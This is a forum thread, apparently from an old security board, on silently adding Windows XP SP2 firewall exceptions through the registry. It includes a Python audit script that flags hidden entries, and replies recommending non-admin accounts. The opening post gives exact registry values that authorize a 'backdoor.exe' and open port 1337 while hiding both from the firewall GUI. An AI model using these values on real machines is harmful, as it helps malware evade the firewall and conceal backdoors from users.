Bypassing Windows Firewall, XP SP2 example
19 years 4 months ago #9121
by ping
The greatest pleasure in life is doing what people say you can not do..!!
Recently I found this way to bypass the Windows SP2 built-in firewall. This is strictly for educational purposes. So, here it goes.
We can bypass windows firewall using registry.
Just open regedit.exe and go to:
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List[/code:1]
As you can see, the SharedAccess service, aka Windows Firewall, contains the names of the applications allowed for outbound connections.
To give access to the desired application we need to add a similar key:
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled"[/code:1]
But then our "backdoor" will be listed in the Firewall GUI's allowed applications.
Anyway, we may hide it by making it this:
[code:1]"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"[/code:1]
We can also globally open any port we want:
[code:1]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List[/code:1]
by adding a similar value inside this registry key:
[code:1]"1337:TCP"="1337:TCP:*:Enabled:Name"[/code:1]
where "Name" is the name we want to be shown in the GUI.
To hide the port from the listing in the GUI we may make something like this:
[code:1]1337:TCP:*:Enabled:@xpsp2res.dll,-22003[/code:1]
and then the port will be hidden from the listing (XP SP2).
It works on XP SP2; I didn't test it on any other OS.
This method is used by some malware/spyware manufacturers, and together with a rootkit it may be really dangerous.
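A defender-side check for the two keys named in the post, as an added example that is not code from the post or from any tool it mentions: it parses a `reg export` of those keys (the sample export below is constructed, and its entries and resource ids are illustrative only) and reports every exception that is not in a baseline you supply, noting when the display name is a `@dll,-id` resource reference, which the firewall GUI resolves instead of showing the raw value, and when a port exception's scope is `*` (any remote address). The baseline set `KNOWN_GOOD` is an assumption for illustration; on a real host you would build it from a clean install. It covers both `AuthorizedApplications` and `GloballyOpenPorts`, so it goes slightly beyond the single entry of each kind the post shows.

```python
"""Audit an exported copy of the XP SP2 firewall policy keys.

Reports exceptions that are not in a known baseline and calls out the ones
whose display name is a DLL resource string (hidden in the GUI listing).
Added example for this thread; not code from the post.
"""
import re
from dataclasses import dataclass, field

# Constructed sample of what "reg export <key> out.reg" produces for the two
# keys from the post. Entries and resource ids are illustrative, not copied
# from a real host. A real export is UTF-16; read it with encoding="utf-16".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Program Files\\Messenger\\msmsgs.exe"="C:\\Program Files\\Messenger\\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP"="139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004"
"1337:TCP"="1337:TCP:*:Enabled:@xpsp2res.dll,-22003"
'''

# Assumed baseline of expected exceptions (lower-cased value names).
KNOWN_GOOD = frozenset({'c:\\program files\\messenger\\msmsgs.exe', '139:tcp'})

APPS_SUFFIX = '\\AuthorizedApplications\\List'
PORTS_SUFFIX = '\\GloballyOpenPorts\\List'

# "name"="data" line of a .reg export; backslashes and quotes are escaped with '\'.
REG_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
# Display name of the form @somefile.dll,-12345 (resolved by the GUI, so the
# raw value never appears in the exceptions list).
RESOURCE_NAME = re.compile(r'^@[^,]+,-\d+$')


def unescape(s):
    """Undo .reg escaping: '\\\\' -> '\\' and '\\"' -> '"'."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text):
    """Return {key_path: {value_name: value_data}} for string values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = REG_VALUE.match(line)
        if m and current is not None:
            keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys


def split_exception(name, data):
    """Split 'name:scope:state:display' into (scope, state, display).

    The value data repeats the value name (app path or port:proto) first, so
    strip that prefix instead of splitting on ':' blindly (paths contain one).
    """
    prefix = name + ':'
    if not data.startswith(prefix):
        return None
    parts = data[len(prefix):].split(':', 2)
    return tuple(parts) if len(parts) == 3 else None


@dataclass
class Finding:
    key: str          # 'AuthorizedApplications' or 'GloballyOpenPorts'
    entry: str        # value name as stored in the registry
    reasons: list = field(default_factory=list)


def audit_firewall_policy(keys, baseline):
    """List every exception not in `baseline`, with the reasons it stands out."""
    findings = []
    for key, values in keys.items():
        if not (key.endswith(APPS_SUFFIX) or key.endswith(PORTS_SUFFIX)):
            continue
        for name, data in values.items():
            if name.lower() in baseline:
                continue
            finding = Finding(key.rsplit('\\', 2)[-2], name, ['not in baseline'])
            fields = split_exception(name, data)
            if fields is None:
                finding.reasons.append('malformed exception value')
            else:
                scope, state, display = fields
                if state.lower() != 'enabled':
                    finding.reasons.append('currently disabled')
                if RESOURCE_NAME.match(display):
                    finding.reasons.append('display name is a resource string (hidden in GUI)')
                if key.endswith(PORTS_SUFFIX) and scope == '*':
                    finding.reasons.append("scope is '*' (any remote address)")
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in audit_firewall_policy(parse_reg_export(SAMPLE_REG), KNOWN_GOOD):
        print(f'{f.key}: {f.entry}\n    ' + '\n    '.join(f.reasons))
```

On the sample, the two legitimate-looking entries are in the baseline and are skipped; the `backdoor.exe` and `1337:TCP` exceptions are reported, each flagged for the resource-string display name the post uses to hide them. Comparing an export against a baseline rather than eyeballing the GUI is the point: the GUI is exactly what the resource-string trick is designed to fool.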
19 years 4 months ago #9126
by nske
Well, of course from an administrator account everything's possible! The firewall's rules had to be stored somewhere, after all.
The above would not work in a limited account, since access to the registry is prohibited.
It is nice that you described this though, if nothing else to demonstrate how easily malware can reconfigure the Windows firewall to allow itself out, and how many more considerations there are when logged in as an administrator!
19 years 4 months ago #9128
by DaLight
I second nske's comments. I run all my users in non-admin mode at work and at home! This, I believe, is the major reason behind spyware infections. Obviously this problem mainly exists in the Windows world, where people are not so familiar with the concept of root and limited user accounts.
19 years 4 months ago #9131
by nske
Well, since Microsoft likes to push users in the direction it wants in everything (default software, default settings, etc.), it would be a good idea to encourage this and some other security-conscious decisions during the installation.
After all, nobody would complain about having to relogin each time they need to install some new software or configure something, as they complain now about having an unusable malware-infected system; besides, the procedure could be more transparent, not requiring the current login session to be disrupted.
PS. And afterwards they could even patent this idea and sue the Linux community for billions! :lol: